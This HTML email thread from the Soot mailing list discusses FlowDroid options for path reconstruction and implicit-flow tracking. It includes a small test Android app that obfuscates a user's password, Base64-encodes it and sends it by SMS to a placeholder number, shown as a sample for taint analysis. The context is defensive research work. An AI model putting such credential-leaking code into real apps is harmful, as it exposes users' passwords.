<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40"><head><meta http-equiv=Content-Type content="text/html; charset=utf-8"><meta name=Generator content="Microsoft Word 15 (filtered medium)"><style><!--
/* Font Definitions */
@font-face
{font-family:SimSun;
panose-1:2 1 6 0 3 1 1 1 1 1;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
{font-family:DengXian;
panose-1:2 1 6 0 3 1 1 1 1 1;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;}
@font-face
{font-family:"MS UI Gothic";
panose-1:2 11 6 0 7 2 5 8 2 4;}
@font-face
{font-family:SimSun;
panose-1:2 1 6 0 3 1 1 1 1 1;}
@font-face
{font-family:DengXian;
panose-1:2 1 6 0 3 1 1 1 1 1;}
@font-face
{font-family:"\@MS UI Gothic";}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0cm;
margin-bottom:.0001pt;
text-align:justify;
text-justify:inter-ideograph;
font-size:10.5pt;
font-family:DengXian;}
a:link, span.MsoHyperlink
{mso-style-priority:99;
color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-priority:99;
color:#954F72;
text-decoration:underline;}
p
{mso-style-priority:99;
margin:0cm;
margin-bottom:.0001pt;
font-size:11.0pt;
font-family:SimSun;}
.MsoChpDefault
{mso-style-type:export-only;}
/* Page Definitions */
@page WordSection1
{size:612.0pt 792.0pt;
margin:72.0pt 90.0pt 72.0pt 90.0pt;}
div.WordSection1
{page:WordSection1;}
--></style></head><body lang=ZH-CN link=blue vlink="#954F72" style='text-justify-trim:punctuation'><div class=WordSection1><p class=MsoNormal><span lang=EN-US>Hi Steven,</span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US>I have enabled implicit flow tracking, but flowdroid did not track code snippets below.</span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US>>>><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'>1 for(char c : pwdString.toCharArray())<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'>2 obfPwd += c + "_";<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'>3 String message = "User: " +<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'>4 user.getName() + " | PWD: " + obfPwd;<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'>5 String message_base64 = Base64.encodeToString(message.getBytes(),Base64.DEFAULT);<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt'>>>><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt'><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt'>I want to obscure password string with line1, 2, 5. As you can see, flowdroid ignored for iteration and Base64 encode.<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt'><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt'>Thanks a lot.<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt'><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt'>Young<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt'><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p><span lang=EN-US><o:p> </o:p></span></p><p><span lang=EN-US><o:p> </o:p></span></p><div style='mso-element:para-border-div;border:none;border-top:solid #E1E1E1 1.0pt;padding:3.0pt 0cm 0cm 0cm'><p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;border:none;padding:0cm'><span lang=EN-US><br></span><b>发件人<span lang=EN-US>: </span></b><span lang=EN-US>Steven Arzt<br></span><b>发送时间<span lang=EN-US>: </span></b><span lang=EN-US>2015</span>年<span lang=EN-US>12</span>月<span lang=EN-US>8</span>日<span lang=EN-US> 22:21<br></span><b>收件人<span lang=EN-US>: </span></b><span lang=EN-US>'XiaoYang';'soot-list@CS.McGill.CA'<br></span><b>主题<span lang=EN-US>: </span></b><span lang=EN-US>AW: [Soot-list] print the path from source(s) to sink(s) found by flowdroid</span></p></div><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:12.0pt;font-family:SimSun'><o:p> </o:p></span></p><p class=MsoNormal><span lang=DE style='font-family:"Calibri",sans-serif;color:#1F497D'>Hi Young,</span><span lang=DE style='font-size:11.0pt;font-family:"Calibri",sans-serif;color:#1F497D'><o:p></o:p></span></p><p class=MsoNormal><span lang=DE style='font-family:"Calibri",sans-serif;color:#1F497D'><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:#1F497D'>The second data flow that was missed is an implicit flow. There is no sequence of direct assignments between source and sink. Instead, the value that arrives at the sink is control-dependent on the value obtained from the source. By default, FlowDroid does not track such dependencies. If you need to, you can enable implicit flow tracking using the --implicit command-line option. This will, however, increase the runtime and memory consumption of your analysis.<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:#1F497D'><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:#1F497D'>Additionally, for real-world apps, you will get a lot of additional flows as this definition of a data flow is very broad.<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:#1F497D'><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:#1F497D'>Best regards,<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:#1F497D'> Steven<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:#1F497D'><o:p> </o:p></span></p><div><div style='border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0cm 0cm 0cm'><p class=MsoNormal align=left style='text-align:left'><b><span lang=DE style='font-size:10.0pt;font-family:"Tahoma",sans-serif'>Von:</span></b><span lang=DE style='font-size:10.0pt;font-family:"Tahoma",sans-serif'> XiaoYang [mailto:yangx92@hotmail.com] <br><b>Gesendet:</b> Dienstag, 8. Dezember 2015 15:14<br><b>An:</b> Steven Arzt; 'soot-list@CS.McGill.CA'<br><b>Betreff:</b> </span><span style='font-size:10.0pt;font-family:"MS UI Gothic",sans-serif'>答复</span><span lang=DE style='font-size:10.0pt;font-family:"Tahoma",sans-serif'>: [Soot-list] print the path from source(s) to sink(s) found by flowdroid<o:p></o:p></span></p></div></div><p class=MsoNormal align=left style='text-align:left'><span lang=DE style='font-size:11.0pt'><o:p> </o:p></span></p><p class=MsoNormal><b><span lang=EN-US style='color:black'>Hi Steven,<o:p></o:p></span></b></p><p class=MsoNormal><span lang=EN-US style='color:black'><o:p> </o:p></span></p><p class=MsoNormal><b><span lang=EN-US style='color:black'>I appended </span></b><b><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'>“—pathalgo contextsensitive” to command line. It showed more information than before. However, it lost some information. <o:p></o:p></span></b></p><p class=MsoNormal><b><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'><o:p> </o:p></span></b></p><p class=MsoNormal><b><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'>For example, below is the android application code snippets.<o:p></o:p></span></b></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'>>>><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> protected void onRestart(){<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> super.onRestart();<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> EditText usernameText =<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> (EditText)findViewById(R.id.username);<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> EditText passwordText =<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> (EditText)findViewById(R.id.pwdString);<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> String uname = usernameText.getText().toString();<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> String pwd = passwordText.getText().toString();<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> if(!uname.isEmpty() && !pwd.isEmpty())<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> this.user = new User(uname, pwd);<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> }<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> <o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> //Callback method defined in xml file<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> public void sendMessage(View view) throws UnsupportedEncodingException{<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> if(user == null) return;<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> Password pwd = user.getpwd();<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> String pwdString = pwd.getPassword();<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> String obfPwd = "";<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> //must track primitives<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> for(char c : pwdString.toCharArray())<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> obfPwd += c + "_";<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> String message = "User: " +<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> user.getName() + " | PWD: " + obfPwd;<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> String message_base64 = Base64.encodeToString(message.getBytes(),Base64.DEFAULT);<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> SmsManager sms = SmsManager.getDefault();<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> sms.sendTextMessage("+86 12345678901",<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> null, message_base64, null, null); //pwd_str+uname_str<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> }<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US>>>></span><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><b><span lang=EN-US>I run the flowdroid with options</span></b><b>“<span lang=EN-US>--pathalgo contextsensitive --implicit true -aplength 15</span></b><b>”<span lang=EN-US>.<o:p></o:p></span></b></p><p><b><span lang=EN-US>Following is the information given by flowdroid.<o:p></o:p></span></b></p><p><span lang=EN-US><o:p> </o:p></span></p><p><span lang=EN-US>>>><o:p> </o:p></span></p><p><span lang=EN-US>The sink virtualinvoke $r9.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+86 12345678901", null, $r5, null, null) on line 49 in method <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)> was called with values from the following sources:</span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>- - $r1 = virtualinvoke $r0.<com.example.leakpasswd.MainActivity: android.view.View findViewById(int)>(2131230724) on line 26 in method <com.example.leakpasswd.MainActivity: void onRestart()></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>on Path:</span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> <com.example.leakpasswd.MainActivity: void onRestart()></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> $r1 = virtualinvoke $r0.<com.example.leakpasswd.MainActivity: android.view.View findViewById(int)>(2131230724)</span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> <com.example.leakpasswd.MainActivity: void onRestart()></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> $r3 = (android.widget.EditText) $r1</span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> <com.example.leakpasswd.MainActivity: void onRestart()></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> $r4 = virtualinvoke $r3.<android.widget.EditText: android.text.Editable getText()>()</span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> <com.example.leakpasswd.MainActivity: void onRestart()></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> $r6 = interfaceinvoke $r4.<android.text.Editable: java.lang.String toString()>()</span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> <com.example.leakpasswd.MainActivity: void onRestart()></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> $z0 = virtualinvoke $r6.<java.lang.String: boolean isEmpty()>()</span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> <com.example.leakpasswd.MainActivity: void onRestart()></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> if $z0 != 0 goto return</span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> <com.example.leakpasswd.MainActivity: void onRestart()></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> $r0.<com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user> = $r7</span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> <com.example.leakpasswd.MainActivity: void onRestart()></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> return</span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> <dummyMainClass: void dummyMainMethod(java.lang.String[])></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> virtualinvoke $r1.<com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)>($r3)</span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> $r2 = $r0.<com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> if $r2 != null goto $r2 = $r0.<com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)></span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>-> virtualinvoke $r9.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+86 12345678901", null, $r5, null, null)</span><span lang=DE><o:p></o:p></span></p><p><span lang=EN-US>>>><o:p> </o:p></span></p><p><span lang=EN-US><o:p> </o:p></span></p><p><b><span lang=EN-US>The flowdroid did not track code below. <o:p></o:p></span></b></p><p><span lang=EN-US>>>><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> for(char c : pwdString.toCharArray())<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> obfPwd += c + "_";<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> String message = "User: " +<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> user.getName() + " | PWD: " + obfPwd;<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:black'> String message_base64 = Base64.encodeToString(message.getBytes(),Base64.DEFAULT);<o:p></o:p></span></p><p><span lang=EN-US>>>><o:p> </o:p></span></p><p><span lang=EN-US><o:p> </o:p></span></p><p><b><span lang=EN-US>Is there solution to handle this?<o:p></o:p></span></b></p><p><span lang=EN-US><o:p> </o:p></span></p><p><b><span lang=EN-US>Grate thanks!!<o:p></o:p></span></b></p><p><b><span lang=EN-US><o:p> </o:p></span></b></p><p><b><span lang=EN-US>Young<o:p></o:p></span></b></p><div style='border:none;border-top:solid #E1E1E1 1.0pt;padding:3.0pt 0cm 0cm 0cm'><p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'><span lang=EN-US><br></span><b>发件人<span lang=EN-US>: </span></b><span lang=EN-US>Steven Arzt<br></span><b>发送时间<span lang=EN-US>: </span></b><span lang=EN-US>2015</span>年<span lang=EN-US>12</span>月<span lang=EN-US>7</span>日<span lang=EN-US> 16:33<br></span><b>收件人<span lang=EN-US>: </span></b><span lang=EN-US>'XiaoYang';'soot-list@CS.McGill.CA'<br></span><b>主题<span lang=EN-US>: </span></b><span lang=EN-US>AW: [Soot-list] print the path from source(s) to sink(s) found by flowdroid</span><span lang=DE><o:p></o:p></span></p></div><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:12.0pt;font-family:SimSun'><o:p> </o:p></span></p><p class=MsoNormal><span lang=DE style='font-family:"Calibri",sans-serif;color:#1F497D'>Hi Xiao,</span><span lang=DE style='font-size:11.0pt;font-family:"Calibri",sans-serif;color:#1F497D'><o:p></o:p></span></p><p class=MsoNormal><span lang=DE style='font-family:"Calibri",sans-serif;color:#1F497D'><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:#1F497D'>That’s possible. You need to enable a path reconstruction algorithm that supports path reconstruction. If you are using the FlowDroid command-line application, just append “--pathalgo contextsensitive” to your command line. It will increase the runtime, though.<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:#1F497D'><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:#1F497D'>Best regards,<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:#1F497D'> Steven<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri",sans-serif;color:#1F497D'><o:p> </o:p></span></p><div><div style='border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0cm 0cm 0cm'><p class=MsoNormal align=left style='text-align:left'><b><span lang=EN-US style='font-size:10.0pt;font-family:"Tahoma",sans-serif'>Von:</span></b><span lang=EN-US style='font-size:10.0pt;font-family:"Tahoma",sans-serif'> <a href="mailto:soot-list-bounces@CS.McGill.CA">soot-list-bounces@CS.Mc<span lang=DE>Gill.CA</span></a></span><span lang=DE style='font-size:10.0pt;font-family:"Tahoma",sans-serif'> [<a href="mailto:soot-list-bounces@CS.McGill.CA">mailto:soot-list-bounces@CS.McGill.CA</a>] <b>Im Auftrag von </b>XiaoYang<br><b>Gesendet:</b> Sonntag, 6. Dezember 2015 04:55<br><b>An:</b> <a href="mailto:soot-list@CS.McGill.CA">soot-list@CS.McGill.CA</a><br><b>Betreff:</b> [Soot-list] print the path from source(s) to sink(s) found by flowdroid<o:p></o:p></span></p></div></div><p class=MsoNormal align=left style='text-align:left'><span lang=DE style='font-size:11.0pt'><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US>Hi all,</span><span lang=DE><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US>Suppose that I found there is information leak in android application by flowdroid. Could I print the path from source(s) to sink(s)?</span><span lang=DE><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US>Take an example. Below is the partial information given by flowdroid.</span><span lang=DE><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US>>>[main] INFO soot.jimple.infoflow.Infoflow - The sink virtualinvoke $r10.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+86 123456789", null, $r6, null, null) in method <com.example.leakpasswd.MainActivity: void onCreate(android.os.Bundle)> was called with values from the following sources:</span><span lang=DE><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US>>>[main] INFO soot.jimple.infoflow.Infoflow - - $r2 = virtualinvoke $r0.<com.example.leakpasswd.MainActivity: android.view.View findViewById(int)>(2131230722) in method <com.example.leakpasswd.MainActivity: void onCreate(android.os.Bundle)></span><span lang=DE><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US>I want to get the path from findViewById to sendTextMessage. Is there a method to handle that? </span><span lang=DE><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US>Great thanks!!</span><span lang=DE><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US>Young </span><span lang=DE><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US><o:p> </o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt'><o:p> </o:p></span></p></div></body></html>